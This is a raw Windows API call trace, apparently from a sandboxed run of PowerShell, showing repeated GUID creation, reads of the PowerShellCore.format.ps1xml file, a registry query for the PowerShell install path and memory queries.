	[0162.131] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xc003ccef, Data2=0xfc3b, Data3=0x4047, Data4=([0]=0x93, [1]=0x44, [2]=0x71, [3]=0xd6, [4]=0xaa, [5]=0x6c, [6]=0x7e, [7]=0x29))) returned 0x0
	[0162.134] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xd2d7d41c, Data2=0x9b56, Data3=0x4f99, Data4=([0]=0x8b, [1]=0xf9, [2]=0xc7, [3]=0xf9, [4]=0x9d, [5]=0xe4, [6]=0x40, [7]=0xe5))) returned 0x0
	[0162.135] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x284cd4de, Data2=0x9fee, Data3=0x453e, Data4=([0]=0x88, [1]=0xfa, [2]=0x77, [3]=0xd8, [4]=0xa5, [5]=0xff, [6]=0xbb, [7]=0x68))) returned 0x0
	[0162.135] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x517f34b, Data2=0x2bd5, Data3=0x468d, Data4=([0]=0xb9, [1]=0x34, [2]=0xb8, [3]=0xaa, [4]=0x1e, [5]=0xee, [6]=0x1c, [7]=0xfe))) returned 0x0
	[0162.136] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x29f0e8a6, Data2=0x8d61, Data3=0x4a9f, Data4=([0]=0x94, [1]=0x5e, [2]=0x49, [3]=0x1d, [4]=0x65, [5]=0x9a, [6]=0xd4, [7]=0xd5))) returned 0x0
	[0162.137] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xba0a05ba, Data2=0x9ba4, Data3=0x4f61, Data4=([0]=0x9f, [1]=0x19, [2]=0xc0, [3]=0xe9, [4]=0x4f, [5]=0x3f, [6]=0x69, [7]=0xaa))) returned 0x0
	[0162.137] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x97b4ce85, Data2=0x84e6, Data3=0x4b18, Data4=([0]=0xba, [1]=0x9, [2]=0x48, [3]=0x18, [4]=0xf7, [5]=0xcf, [6]=0x6d, [7]=0x3b))) returned 0x0
	[0162.138] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xb468b635, Data2=0x358c, Data3=0x4115, Data4=([0]=0x9c, [1]=0x9d, [2]=0xd3, [3]=0x27, [4]=0xa1, [5]=0xd9, [6]=0x4d, [7]=0x42))) returned 0x0
	[0162.138] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x47cd501c, Data2=0x9396, Data3=0x4ed3, Data4=([0]=0x88, [1]=0x69, [2]=0xe5, [3]=0xbc, [4]=0xe3, [5]=0x34, [6]=0x43, [7]=0x74))) returned 0x0
	[0162.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ddec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0162.138] GetLastError () returned 0x0
	[0162.138] SetErrorMode (uMode=0x1) returned 0x1
	[0162.139] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0162.139] GetLastError () returned 0x0
	[0162.139] GetFileType (hFile=0x34c) returned 0x1
	[0162.139] SetErrorMode (uMode=0x1) returned 0x1
	[0162.139] GetFileType (hFile=0x34c) returned 0x1
	[0162.139] ReadFile (in: hFile=0x34c, lpBuffer=0x3140574, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x3140574*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.328] GetLastError () returned 0x0
	[0162.381] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.381] GetLastError () returned 0x0
	[0162.381] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.382] GetLastError () returned 0x0
	[0162.382] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.382] GetLastError () returned 0x0
	[0162.382] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.382] GetLastError () returned 0x0
	[0162.382] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.382] GetLastError () returned 0x0
	[0162.382] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.382] GetLastError () returned 0x0
	[0162.382] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.382] GetLastError () returned 0x0
	[0162.383] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.383] GetLastError () returned 0x0
	[0162.384] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.385] GetLastError () returned 0x0
	[0162.385] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.385] GetLastError () returned 0x0
	[0162.385] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.385] GetLastError () returned 0x0
	[0162.385] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.385] GetLastError () returned 0x0
	[0162.385] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.385] GetLastError () returned 0x0
	[0162.385] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.386] GetLastError () returned 0x0
	[0162.386] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.386] GetLastError () returned 0x0
	[0162.386] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.386] GetLastError () returned 0x0
	[0162.387] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.387] GetLastError () returned 0x0
	[0162.387] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.387] GetLastError () returned 0x0
	[0162.387] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.387] GetLastError () returned 0x0
	[0162.388] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.388] GetLastError () returned 0x0
	[0162.388] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0xe67, lpOverlapped=0x0) returned 1
	[0162.388] GetLastError () returned 0x0
	[0162.388] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad6bb3, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad6bb3*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0162.388] GetLastError () returned 0x0
	[0162.388] ReadFile (in: hFile=0x34c, lpBuffer=0x2ad7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2ad7578*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0162.388] GetLastError () returned 0x0
	[0162.389] CloseHandle (hObject=0x34c) returned 1
	[0162.662] GetLastError () returned 0x0
	[0162.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0162.662] GetLastError () returned 0x0
	[0162.663] SetErrorMode (uMode=0x1) returned 0x1
	[0162.663] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2af7e14 | out: lpFileInformation=0x2af7e14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0162.867] GetLastError () returned 0x0
	[0162.867] SetErrorMode (uMode=0x1) returned 0x1
	[0162.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0162.867] GetLastError () returned 0x0
	[0162.867] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e2d8 | out: phkResult=0x14e2d8*=0x34c) returned 0x0
	[0162.867] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x0, lpcbData=0x14e31c*=0x0 | out: lpType=0x14e320*=0x1, lpData=0x0, lpcbData=0x14e31c*=0x56) returned 0x0
	[0162.868] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x721bd8, lpcbData=0x14e31c*=0x56 | out: lpType=0x14e320*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e31c*=0x56) returned 0x0
	[0162.868] RegCloseKey (hKey=0x34c) returned 0x0
	[0162.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0162.868] GetLastError () returned 0x0
	[0162.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0162.868] GetLastError () returned 0x0
	[0162.869] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xf76a2118, Data2=0x81ce, Data3=0x40cc, Data4=([0]=0xa1, [1]=0xbf, [2]=0x61, [3]=0x3, [4]=0x22, [5]=0xda, [6]=0x1d, [7]=0xd5))) returned 0x0
	[0162.869] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x7cdeb749, Data2=0x788a, Data3=0x4356, Data4=([0]=0xa6, [1]=0xb4, [2]=0x27, [3]=0x7b, [4]=0xe4, [5]=0xa7, [6]=0xc6, [7]=0x84))) returned 0x0
	[0162.869] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x641d455f, Data2=0x79fa, Data3=0x4efc, Data4=([0]=0x8a, [1]=0x68, [2]=0xf7, [3]=0x56, [4]=0x5d, [5]=0x2d, [6]=0xc4, [7]=0x92))) returned 0x0
	[0162.869] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x57554058, Data2=0x450c, Data3=0x42ea, Data4=([0]=0xaf, [1]=0xbb, [2]=0x74, [3]=0xc4, [4]=0x41, [5]=0x33, [6]=0x43, [7]=0x4d))) returned 0x0
	[0162.870] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xa436fa56, Data2=0xcedb, Data3=0x49a1, Data4=([0]=0x8f, [1]=0xe1, [2]=0x79, [3]=0xe9, [4]=0x40, [5]=0x9e, [6]=0x22, [7]=0x87))) returned 0x0
	[0162.870] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x8b936ec2, Data2=0xfbf1, Data3=0x4bda, Data4=([0]=0x85, [1]=0x1c, [2]=0x53, [3]=0x28, [4]=0x64, [5]=0xd8, [6]=0x24, [7]=0x86))) returned 0x0
	[0162.870] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x1deecca4, Data2=0x84d9, Data3=0x42fe, Data4=([0]=0xa6, [1]=0x21, [2]=0x7b, [3]=0xd, [4]=0xb4, [5]=0xe4, [6]=0xc5, [7]=0x4))) returned 0x0
	[0162.870] VirtualQuery (in: lpAddress=0x14d0a0, lpBuffer=0x14e0a0, dwLength=0x1c | out: lpBuffer=0x14e0a0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.870] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x5552b2f7, Data2=0x3cfc, Data3=0x45d9, Data4=([0]=0xb0, [1]=0xc8, [2]=0xec, [3]=0xa, [4]=0xc3, [5]=0x3b, [6]=0xe1, [7]=0x87))) returned 0x0
	[0162.870] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x831a7a18, Data2=0x3f6e, Data3=0x4e22, Data4=([0]=0xa1, [1]=0x55, [2]=0xf, [3]=0x90, [4]=0x38, [5]=0xbf, [6]=0x4d, [7]=0x9a))) returned 0x0
	[0162.870] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xd3ea0a6e, Data2=0x79a9, Data3=0x4c5c, Data4=([0]=0x9a, [1]=0x76, [2]=0x28, [3]=0xfe, [4]=0x54, [5]=0x2a, [6]=0x6e, [7]=0xb7))) returned 0x0
	[0162.870] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xc7aa80a1, Data2=0xcd9f, Data3=0x4c1a, Data4=([0]=0x87, [1]=0x28, [2]=0xaa, [3]=0x8d, [4]=0xd, [5]=0x22, [6]=0x2b, [7]=0xaf))) returned 0x0
	[0162.870] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x8166f3c3, Data2=0x5e70, Data3=0x466b, Data4=([0]=0xae, [1]=0xa8, [2]=0xab, [3]=0x9f, [4]=0x11, [5]=0x87, [6]=0x3a, [7]=0xf8))) returned 0x0
	[0162.871] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x3cbf5356, Data2=0x830d, Data3=0x48d6, Data4=([0]=0xa8, [1]=0xec, [2]=0xcc, [3]=0x65, [4]=0x99, [5]=0xda, [6]=0x2c, [7]=0x35))) returned 0x0
	[0162.871] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x3df4f785, Data2=0x5887, Data3=0x4386, Data4=([0]=0x8e, [1]=0xed, [2]=0xbc, [3]=0x4a, [4]=0xdb, [5]=0xdf, [6]=0xa8, [7]=0x69))) returned 0x0
	[0162.871] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x3f4c86c8, Data2=0x9fef, Data3=0x4aef, Data4=([0]=0xa2, [1]=0xed, [2]=0x29, [3]=0x55, [4]=0xf8, [5]=0xbe, [6]=0xfa, [7]=0x86))) returned 0x0
	[0162.871] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xb86ff043, Data2=0x3fc3, Data3=0x41b4, Data4=([0]=0xa2, [1]=0x9f, [2]=0xf9, [3]=0x1, [4]=0xd9, [5]=0xd6, [6]=0xad, [7]=0xb9))) returned 0x0
	[0162.871] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xf38018f4, Data2=0xd509, Data3=0x4a59, Data4=([0]=0xba, [1]=0x38, [2]=0xa9, [3]=0x90, [4]=0xf6, [5]=0x38, [6]=0x1f, [7]=0x4f))) returned 0x0
	[0162.871] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x2ccf6de2, Data2=0xb869, Data3=0x46d6, Data4=([0]=0x9a, [1]=0x9d, [2]=0xdc, [3]=0x1c, [4]=0xc2, [5]=0xf7, [6]=0xe, [7]=0x8c))) returned 0x0
	[0162.872] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x3a42abb8, Data2=0xe9ac, Data3=0x4a82, Data4=([0]=0x8b, [1]=0x90, [2]=0x1c, [3]=0xb4, [4]=0x4e, [5]=0x84, [6]=0xd8, [7]=0xd))) returned 0x0
	[0162.872] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.872] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.873] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.873] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xf6d68e9f, Data2=0xb93c, Data3=0x4121, Data4=([0]=0xb0, [1]=0x88, [2]=0xb0, [3]=0x9e, [4]=0xc, [5]=0x87, [6]=0x4c, [7]=0xc1))) returned 0x0
	[0162.873] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x6c228031, Data2=0xb3ad, Data3=0x4337, Data4=([0]=0x92, [1]=0x38, [2]=0xed, [3]=0x8, [4]=0xb1, [5]=0xb0, [6]=0xe, [7]=0xd9))) returned 0x0
	[0162.873] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xd89a15c8, Data2=0xf7ab, Data3=0x4718, Data4=([0]=0x8c, [1]=0xf3, [2]=0xea, [3]=0x3c, [4]=0x0, [5]=0x9d, [6]=0x47, [7]=0x38))) returned 0x0
	[0162.873] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x35cef9cf, Data2=0xe295, Data3=0x46b4, Data4=([0]=0xb9, [1]=0xc0, [2]=0x6c, [3]=0xec, [4]=0xdc, [5]=0xc7, [6]=0xdb, [7]=0x6a))) returned 0x0
	[0162.874] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x52e3800e, Data2=0x200c, Data3=0x4c95, Data4=([0]=0xa9, [1]=0x47, [2]=0xf4, [3]=0xb2, [4]=0x21, [5]=0x67, [6]=0x44, [7]=0x52))) returned 0x0
	[0162.874] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xb1ee4849, Data2=0x831b, Data3=0x45b7, Data4=([0]=0x9f, [1]=0x51, [2]=0xf, [3]=0x92, [4]=0xf7, [5]=0x38, [6]=0x68, [7]=0x78))) returned 0x0
	[0162.874] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xa6973e72, Data2=0x9104, Data3=0x4a92, Data4=([0]=0xbd, [1]=0x50, [2]=0xd2, [3]=0xfe, [4]=0x19, [5]=0x4a, [6]=0x62, [7]=0x19))) returned 0x0
	[0162.874] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xaa8a29c2, Data2=0xd45f, Data3=0x4396, Data4=([0]=0x97, [1]=0x9a, [2]=0xe7, [3]=0xce, [4]=0x56, [5]=0xd3, [6]=0x1b, [7]=0x39))) returned 0x0
	[0162.874] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x2fd122e7, Data2=0xc7e5, Data3=0x4469, Data4=([0]=0x81, [1]=0xfc, [2]=0xa5, [3]=0x23, [4]=0xc, [5]=0x6, [6]=0xdf, [7]=0xf4))) returned 0x0
	[0162.874] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xdfd678af, Data2=0x8419, Data3=0x49f2, Data4=([0]=0xa9, [1]=0x4b, [2]=0xd0, [3]=0x47, [4]=0x48, [5]=0x3e, [6]=0xc, [7]=0xe4))) returned 0x0
	[0162.874] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xc40a525, Data2=0xd756, Data3=0x4d33, Data4=([0]=0xa6, [1]=0xbf, [2]=0xff, [3]=0xc8, [4]=0xe7, [5]=0x81, [6]=0xd7, [7]=0xc9))) returned 0x0
	[0162.875] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x17ddb4af, Data2=0xd160, Data3=0x4697, Data4=([0]=0xaf, [1]=0xa4, [2]=0x10, [3]=0x33, [4]=0xb4, [5]=0xfa, [6]=0xb3, [7]=0x66))) returned 0x0
	[0162.875] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x857f4a4b, Data2=0xcd89, Data3=0x4be1, Data4=([0]=0x8e, [1]=0xa, [2]=0xc9, [3]=0x10, [4]=0xa, [5]=0x33, [6]=0x20, [7]=0xa9))) returned 0x0
	[0162.875] VirtualQuery (in: lpAddress=0x14d0a0, lpBuffer=0x14e0a0, dwLength=0x1c | out: lpBuffer=0x14e0a0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.875] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xecd37b3c, Data2=0x3f4d, Data3=0x435d, Data4=([0]=0xac, [1]=0x52, [2]=0xda, [3]=0x68, [4]=0x9b, [5]=0x75, [6]=0x8b, [7]=0x28))) returned 0x0
	[0162.875] VirtualQuery (in: lpAddress=0x14d0a0, lpBuffer=0x14e0a0, dwLength=0x1c | out: lpBuffer=0x14e0a0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.878] VirtualQuery (in: lpAddress=0x14d0a0, lpBuffer=0x14e0a0, dwLength=0x1c | out: lpBuffer=0x14e0a0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.882] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x2b38df05, Data2=0x6cb8, Data3=0x4a39, Data4=([0]=0xab, [1]=0x24, [2]=0x81, [3]=0xd1, [4]=0x68, [5]=0xe6, [6]=0xe1, [7]=0x5d))) returned 0x0
	[0162.882] VirtualQuery (in: lpAddress=0x14d0a0, lpBuffer=0x14e0a0, dwLength=0x1c | out: lpBuffer=0x14e0a0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.882] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x1c4dbb2e, Data2=0x8312, Data3=0x497e, Data4=([0]=0xa2, [1]=0xb3, [2]=0x5f, [3]=0xf9, [4]=0x3f, [5]=0x66, [6]=0x30, [7]=0xe7))) returned 0x0
	[0162.883] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x56ea0711, Data2=0x19f7, Data3=0x4154, Data4=([0]=0x8a, [1]=0x60, [2]=0x63, [3]=0xcc, [4]=0xe4, [5]=0x49, [6]=0x74, [7]=0x79))) returned 0x0
	[0162.883] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x3f1b5468, Data2=0xda1b, Data3=0x4254, Data4=([0]=0xa0, [1]=0xe4, [2]=0x54, [3]=0x7, [4]=0x37, [5]=0x60, [6]=0x18, [7]=0xf5))) returned 0x0
	[0162.883] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x7b044f90, Data2=0xfaa6, Data3=0x47d5, Data4=([0]=0x82, [1]=0x79, [2]=0xe2, [3]=0x84, [4]=0x1a, [5]=0x1d, [6]=0x56, [7]=0xff))) returned 0x0
